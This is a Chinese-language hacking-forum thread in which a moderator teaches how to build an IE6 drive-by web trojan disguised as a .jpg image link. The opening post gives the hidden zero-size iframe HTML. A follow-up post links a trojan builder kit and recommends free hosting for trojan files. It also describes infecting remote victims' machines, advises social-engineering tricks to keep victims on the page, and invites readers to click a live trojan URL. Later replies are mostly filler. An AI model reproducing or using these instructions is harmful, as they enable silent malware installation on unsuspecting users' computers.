论坛: 菜鸟乐园 标题: 做IE6.0网页木马[方法 复制本贴地址    
作者: abctm [abctm]    版主   登录



做后缀名为jpg的IE6.0网页木马
前语:这篇帖子里所写的东西如果大家能够学会,从此网上将又不得安宁!我所希望的仅仅是将来那些受害者不要骂我!
特点:1 针对任何没有打过补丁的IE版本都有效!
2 木马下载过程中防火墙不会做任何反应!
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg   和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性!

首先我要给大家说的是以下所讲的东西极其简单,只需要你稍微懂得一点HTML语言,你就能够做出各式各样的网页木马。。。不懂也没关系,,文章里会提供现成的代码让你复制!好了,,废话少说,入正题!

网页木马至今已出了很多代,品种格式各样,目前最新最实用的是针对各种IE版本都有效的网页木马,我们统称它们IE6.0木马,说到这里,我们就进行本文主题的第一部分,制作IE6.0木马,详细步骤及制作工具另附注意事项请参阅这篇贴子
http://www.huigezi.com/forum_view.asp?forum_id=2&view_id=1624
里面有详细的说解!

根据上面贴子里的教材如果你已经成功的制作出了IE6.0网页木马。那么我们继续下一步,修改网页木马的地址的后缀名!

一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!那么我们怎么修改呢?很简单!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。

于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!

打开记事本写入如下一段代码:
<html>
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg 。

剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!

别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上!

说到这里。相信大家已经很明白了。再说下去就是浪费大家宝贵的时间!就此打住!祝大家成功制作出自己的木马。。。。



[此贴被 日月双星(abctm) 在 11月18日21时16分 编辑过]

地主 发表时间: 11/07 13:37

回复: abctm [abctm]   版主   登录
帮你成功的制作IE6。0木马!有兴趣的朋友进来!
血汉网页木马大家一定很熟悉了,针对各种版本IE都有效的效让
很多朋友都想试一试。但是我看到很多帖子上都说自己苦于找不到
支持ASP的免费空间而苦恼,正好本人手头上有一个,拿出来给大家
分享!

首先送上血汗网页木马的制作工具及动画教程: http://jdwl.net.cn/qfaq/upload/download/wymm.rar
大家看过以后就会对制作步骤成竹在胸!

ASP免费空间申请地址:http://free.63dns.com/
傻瓜式的操作。非常容易!

不过有一点我要告诉大家,这个空间不允许上传exe文件,想发木马
的朋友还的麻烦一点再申请一个普通空间上传你的单一木马文件!

普通空间申请地址http://www.3322.net/cgi-bin/apply
这里提供的实为收费空间,但有20天左右的免费试用期,相信对每一
个只是想发木马的朋友已经足够!

另外还有一点想补充的是做好的木马并不象作者说的对任何版本都有效
。但是对我自己的电脑却非常有效果,无论网页中加入的是什么EXE文件
,都能够成功的隐藏运行!我用的XP  IE6。0!可我在肉机上远程打开
我的网页。10个人中大概只有5`6个吧!通过屏幕捕获查看对方的电脑,
对方的确是已经打开了我加入了木马的网页!

成功使用网页木马最重要的一点个人经验告诉大家,连接着木马的网页要做
的够吸引人,不一定是豪华,但一定要吸引人,记住。一定要吸引人,要让对方
在你的主页上停留时间达到他的电脑下载木马所需要的时间够长,少一秒都不行,
尤其是你的网页中加入的是象灰鸽子这样大服务端的情况!否则等木马还没有
下载完的时候对方就关闭了你的网页,那就前功尽弃!一切都是白干!

相信大家都有过这样的经历,当你打开了一个不知名的网页,发现里面什么都
没有,或者是极其简陋,就算当时你没有任何的防护心理,你也会随手将其关闭
对不对!
 
成功种植木马不光需要优秀的制作工具,还搀杂着社会工程学和心理学,这点应该
很多人都明白,,这里推荐一款优秀的网页制作工具---东方网页王III  ,傻瓜式
的操作就能够制出精美的网页,网页上的文字和图片
包括多媒体的坐标可以随意定位!不需要你懂的任何HTML语言!所见即所得!
具体下载地址这里就不写上了,大家只要到任何一个搜索引擎里打上--东方网页王III,
很快就能找到一大堆下载地址!

最后送上就是这个对我自己非常有效的网页木马地址,供大家参阅,看看
你的电脑是不是和我一样,呵呵 http://vod520.3322.net/11/068.jpg
如果有效,结果为你的屏幕左右来回滚动约10秒钟!纯属恶作剧,对系统
无任何危害,,本人以人格担保,里面决无危害他人安全及隐私的内容如
有其他现象发生,您竟可骂娘!。欢迎大家积极点击!

好了。就到这里。祝大家玩马愉快!


B1层 发表时间: 11/07 13:38

回复: lovehuashi [lovehuashi]   论坛用户   登录
我一将你加为好友,可以qq聊聊吗?希望我门能成为朋友!!!!!!!!!!!!!

B2层 发表时间: 11/07 14:32

回复: lovehuashi [lovehuashi]   论坛用户   登录
说话呀,胸台!!

B3层 发表时间: 11/07 14:42

回复: abctm [abctm]   版主   登录
哦,看见了,我去上学去了

B4层 发表时间: 11/07 17:50

回复: lyl82 [lyl82]   论坛用户   登录
顶!!!

B5层 发表时间: 11/07 22:08

回复: advantech [advantech]   论坛用户   登录
实际上又很多的,只要将后缀名改一下,就能骗过防火墙和杀毒软件的,但别有恶意。


[此贴被 advantech(advantech) 在 11月07日23时19分 编辑过]

B6层 发表时间: 11/07 23:33

回复: feiyan521 [feiyan521]   论坛用户   登录
顶~~~~~~~

B7层 发表时间: 11/07 23:56

回复: abctm [abctm]   版主   登录


B8层 发表时间: 11/09 12:48

回复: abctm [abctm]   版主   登录
哈哈我顶

B9层 发表时间: 11/18 18:08

回复: zerosmile [zerosmile]   论坛用户   登录
啊、我狂顶。

B10层 发表时间: 11/18 18:23

回复: abctm [abctm]   版主   登录
哈哈,看呀

B11层 发表时间: 11/18 21:40

回复: abctm [abctm]   版主   登录
需要么》?看

B12层 发表时间: 04-02-26 12:13

回复: chiru [chiru]   论坛用户   登录
顶你.

B13层 发表时间: 04-02-26 14:30

回复: newmyth21 [newmyth21]   论坛用户   登录
我晕,这么多水贴啊

B14层 发表时间: 04-02-26 14:37

回复: jusmins [jusmins]   论坛用户   登录


B15层 发表时间: 04-02-26 19:53

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号